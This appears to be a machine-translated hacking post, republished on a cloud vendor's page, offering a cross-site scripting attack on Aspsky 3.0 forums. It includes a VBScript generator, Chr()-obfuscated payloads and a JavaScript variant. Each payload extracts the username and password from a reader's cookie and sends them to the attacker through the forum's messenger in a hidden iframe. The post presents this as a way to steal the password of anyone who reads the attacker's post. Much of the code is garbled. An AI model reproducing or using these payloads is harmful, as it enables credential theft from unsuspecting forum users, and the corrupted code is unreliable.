Perfect solution to the problem of the cookie frame of the cross-station script

Source: Internet
Author: User
Tags chr end window
cookie| Script | solve | problem

The Self.window way to see the wings of lust
In fact, I've always had a way to never tell anyone:
Played for a long time to announce the hehe:
<script language=vbs>
Sub Changeq ()
If form1.loc.value= "" or form1.who.value= "" Then
MsgBox "No address or user name added?"
Exit Sub
End If
Loc=form1.loc.value
User=form1.who.value
Str= "rtadjacenthtml" ("BeforeEnd" "," "<div style=display:none&
Gt;<iframe id=sendmessage></iframe></div> ""): Call SE
Ndmessage.window.open ("" "& Loc &"/messanger.asp?action=send&touser= "
& user & "&title=" +mid (Document.cookie,instr LCase (Document.cookie),
"" "Password" "+9,10) +" "&message=" "+" "I am a Goo
D Boy "", "" _self "") "/>"
Form1.area.value=str
End Sub

</script>
<body>
<font size=7 Color=red>aspsky 3.0 Steal---c.z.y original </FONT>
<form name=form1>
Set send address: <input type=text name=loc size=50><br>
▲ Send address form like: Http://www.nnit30.com/newbbs (Newbbs is the installation directory of forum in the website
At last
Do not add/) <br>
User name sent: <input type=text name=who size=20>-------------
<input Type=button name=change value= Generate Code Onclick=changeq () ><br>
Generated code:) <textarea Name=area rows=10 cols=100></textarea>
</form>
</body>

The results of most of the day, steal the Aspsky 3.0 code to change the following
Then sent to your post, as long as someone read your posts, his password will automatically send to your
The mailbox in the forum, cool bar, in fact, I was written in VBScript snwcwt with JavaScript
Write a problem without double quotes and can write several lines of code at the same time so be practical!!
But the effect is almost ha: (note to first change the following Dongdong address sent
After all written in one line)
R ($) &AMP;CHR (119) &AMP;CHR (119) &AMP;CHR (119) &AMP;CHR (a) &chr (a) &chr (a) &AMP;CHR (116) &chr
(&AMP;CHR) &AMP;CHR (&AMP;CHR) &AMP;CHR (a) &AMP;CHR (109) &AMP;CHR (a) &chr (a) &AMP;CHR (a) & Chr (119
&AMP;CHR () &chr (&AMP;CHR) &AMP;CHR (a) &AMP;CHR (109) &AMP;CHR (a) &AMP;CHR () &AMP;CHR (+) &AMP;CHR (&c)
HR (a) &AMP;CHR (&AMP;CHR) &AMP;CHR (114) &AMP;CHR (&AMP;CHR) &chr () &AMP;CHR () 112 (63) &chr
(&AMP;CHR) &AMP;CHR (116) &AMP;CHR (a) &chr (a) &chr (a) &AMP;CHR (101) &AMP;CHR (a) &AMP;CHR (1
&AMP;CHR () &AMP;CHR &AMP;CHR (116) &AMP;CHR (a) &AMP;CHR (117) &AMP;CHR (m) &chr (a) &AMP;CHR (114) &AMP;CHR (6
1) &AMP;CHR (122) &AMP;CHR (121) &AMP;CHR (&AMP;CHR) &AMP;CHR (116) &AMP;CHR (a) &AMP;CHR (116) &AMP;CHR (108) & Chr (101
) &AMP;CHR (&AMP;CHR) &AMP;CHR (a) &chr (a) &AMP;CHR (&AMP;CHR) &AMP;CHR ((a) & Chr (115)
&AMP;CHR () &chr (&AMP;CHR) &AMP;CHR (a) &AMP;CHR () +chr () &chr () &AMP;CHR (115) &ch
R (LCase) +mid (Document.cookie), InStr (LCase (Document.cookie), Chr (112) +CHR () +c
HR (+CHR) +CHR (119) +CHR () +CHR (114) +CHR (m) +9,len (Document.cookie)-ins
TR (LCase (document.cookie), Chr (112) +CHR (+CHR) +CHR (+) +CHR (+) 119
HR (114) +CHR) (+9) +CHR (a) +CHR (m) +chr (a) +CHR (m) +chr (&AMP;CHR) &AMP;CHR
R (&AMP;CHR) +mid (LCase (Document.cookie), InStr (LCase (Document.cookie), Chr (117) +
Chr (+CHR) +CHR (114) +CHR (+CHR) +CHR () 109 (a) +CHR (a)) +9, InStr (LCase (Do
Cument.cookie), Chr (117) +CHR (a) +CHR (+CHR) 114 (() +CHR () +CHR (108) +CHR () +CHR (
)-1)-instr (LCase (Document.cookie), Chr (117) +CHR () +chr (i) +CHR (114) +CHR (11
0) +CHR (+CHR) (109) +CHR (a)) -9), Chr (a) &AMP;CHR (a), Chr (116) &AMP;CHR (a) &AMP;CHR (112) (
&AMP;CHR (a) &AMP;CHR (m) &chr (a) &chr (a) &AMP;CHR () &AMP;CHR (108) &AMP;CHR (a) &AMP;CHR (102) &AMP;CHR (116) &
Chr (&AMP;CHR) &AMP;CHR (a) &chr (a) &chr (a) &chr (a) &AMP;CHR (m) &AMP;CHR (105) &AMP;CHR (1
&AMP;CHR () &AMP;CHR (116) &AMP;CHR (a) &AMP;CHR (&AMP;CHR) &AMP;CHR (a) 119 (m) &AMP;CHR (a) & Chr (116
&AMP;CHR () &AMP;CHR () &chr) "alt=" a perfect solution to the cookie-boxed problem of Cross-site scripting-cross-Station cookies >

Simplified form: window.open (open connection, form name, form size setting)
Open connections:
The first part:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send .....
The corresponding encoding is


Chr () &AMP;CHR (116) &AMP;CHR (116) &AMP;CHR (112) &AMP;CHR (a) &AMP;CHR (&AMP;CHR) &AMP;CHR ($) 119 &
Chr (119) &AMP;CHR (119) &AMP;CHR (&AMP;CHR) &AMP;CHR (a) &chr (a) &AMP;CHR (48) 116 (a) &AMP;CHR (Wuyi) &AMP;CHR &ch
R (&AMP;CHR) &AMP;CHR &AMP;CHR (109) &AMP;CHR (a) &AMP;CHR (&AMP;CHR) &AMP;CHR (a) 119 (98) &AMP;CHR (9
8) &AMP;CHR (&AMP;CHR) &AMP;CHR (109) &AMP;CHR () &AMP;CHR (+) &AMP;CHR (+) &AMP;CHR () &AMP;CHR (&) Chr (103
) &AMP;CHR (114) &AMP;CHR (&AMP;CHR) &chr (&AMP;CHR) &AMP;CHR () 112 () &AMP;CHR () &AMP;CHR () &AMP;CHR ( &AMP;CH)
R (116) &AMP;CHR (a) &chr (a) &chr (a) &chr (a) &AMP;CHR () &AMP;CHR (a) &AMP;CHR (100) &ch
R (&AMP;CHR) (116) &AMP;CHR (a) &AMP;CHR (117) &AMP;CHR () &AMP;CHR (a) &AMP;CHR (114) &AMP;CHR (99) &AMP;CHR (
122) &AMP;CHR (121) &AMP;CHR (a) &AMP;CHR (116) &AMP;CHR (a) &AMP;CHR (116) &AMP;CHR (108) &AMP;CHR (a) &AMP;CHR (61) &AMP;CHR (1
&AMP;CHR (&AMP;CHR) &chr (&AMP;CHR) &AMP;CHR (109) &AMP;CHR (a) &chr (a) &AMP;CHR (115) &AMP;CHR (9
7) &AMP;CHR (&AMP;CHR) &AMP;CHR (61)

Different sites have to change their attention to where they ended and the names of the users they sent here are changed here.
For encoding, look at the following code:


<script language=vbs>
Sub Main ()
Base=form1.text1.value
For I=1 to Len (base)
AA=ASC (Mid (base,i,1))
document.write "Chr (" & AA & ")" & "&"
Next
End Sub
</script>
<body ><form name=form1><table>
<tr><td>
<input Type=text Name=text1 size=40><br>
<input Type=button name=button1 onclick=main () value=change>
</td></tr>
</table></form></body>
Part II: User name and password in the extracted cookie

------------------------One more JS to learn----------------------------------

' username=\ '); var iuser1=mycookie.indexof (\ ' &\ ', IUSER0); if (iuser1==-1) iuser1=my
Cookie.length;var username=mycookie.substring (iuser0+9,iuser1); var Ipw0=mycookie
. indexOf (\ ' password=\ '); Ipw1=mycookie.indexof (\ ' &\ ', iPW0); if (ipw1==-1) Ipw1=myco
Okie.length;var password=mycookie.substring (IPW0+9,IPW1);d OCUMENT.BODY.INSERTADJ
Acenthtml (\ ' beforeend\ ', \ ' <div style=display:block><iframe id=sendmessage src=me
Ssanger.asp?action=new&touser=snwcwt></iframe></div>\ '); sendmessage.window.docum
Ent.location=\ ' cwt&title=\ ' +username+\ ' password &message=username=\ ' +username+\ ' password=\ ' +pa
Ssword+\ '; ') ' />



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.